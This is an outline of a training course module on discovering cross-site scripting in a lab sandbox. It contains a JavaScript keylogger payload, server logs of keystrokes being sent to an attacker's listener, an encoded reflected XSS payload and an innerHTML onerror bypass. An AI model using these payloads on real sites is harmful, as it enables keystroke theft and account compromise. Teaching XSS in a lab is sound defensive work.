Module 5: Cross-Site Scripting Introduction and Discovery

Introduction to the Sandbox

Accessing the Sandbox

Start the VPN and start the VM. Add the IP to hosts file.

Understanding the Sandbox

Explaining the sandbox webpage.

JavaScript Basics for Offensive Uses

Syntax Overview

Function example

01  function processData(data) {
02    data.items.forEach(item => {
03      console.log(item)
04    });
05  }
06
07  let foo = {
08    items: [
09      "Hello",
10      "Zdravo",
11      "Hola"
12    ]
13  }
14
15  processData(foo)

Useful APIs

Logging inputs

logKey function

Capturing Key stroke

Typing into Eval

Starting HTTP listener

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Using fetch

HTTP Server Log

kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
172.16.174.4 - - [11/Aug/2021 19:15:53] "GET /hello HTTP/1.1" 404 -

Original Keylogging Payload

function logKey(event){
	console.log(event.key)
}

document.addEventListener('keydown', logKey);

Sending keystrokes back

HTTP Server Log

...
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key=I HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:39] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key= HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:39] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:39] "GET /k?key=l HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=i HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=k HTTP/1.1" 404 -
192.168.121.101 - - [11/Aug/2021 19:23:40] code 404, message File not found
192.168.121.101 - - [11/Aug/2021 19:23:40] "GET /k?key=e HTTP/1.1" 404 -
...

Cross-Site Scripting - Discovery

Reflected Server XSS

Often found in locations where user input is sent via GET parameters.

Searchin for "offsec"

Inspecting "offsec"

It's inside a <div> tag, it may be vulnerable. Testing with HTML injection has less potential for error — this doesn't always mean we can inject JavaScript but is a great indicator.

Injecting HTML to Search

Search Alert box

Encoded search payload

search.php?s=%3Cscript%3Ealert(0)%3C/script%3E

XSS rendered on Victim - Search

Reviewing HTTP Response in Burp Suite

Stored Server XSS

Leaving a comment

Blog Comment Inspection

Sanitized Comment

Inspecting Sanitized Comment

Raw HTML of Comment

H1 in Username

Rendered H1

XSS payload in Blog Comment

Executing XSS Payload using Target User Browser

Reflected Client XSS

Survey Home Page

Survey HTML Injection

Finding Request in the Network Tools

Viewing the Response Payload

Reviewing Survey.js

Payload not executing in Client XSS

Reviewing Injection Point

Mozilla's innerHTML Bypass

const name = "<img src='x' onerror='alert(1)'>";
el.innerHTML = name; // shows the alert

Exploiting with Mozilla's Bypass

Stored Client XSS

Summary of Answers

HTML in Survey

Rendered HTML in Survey

XSS Payload in Survey

Alert Box on Result Page

Alert Box in Victim's Browser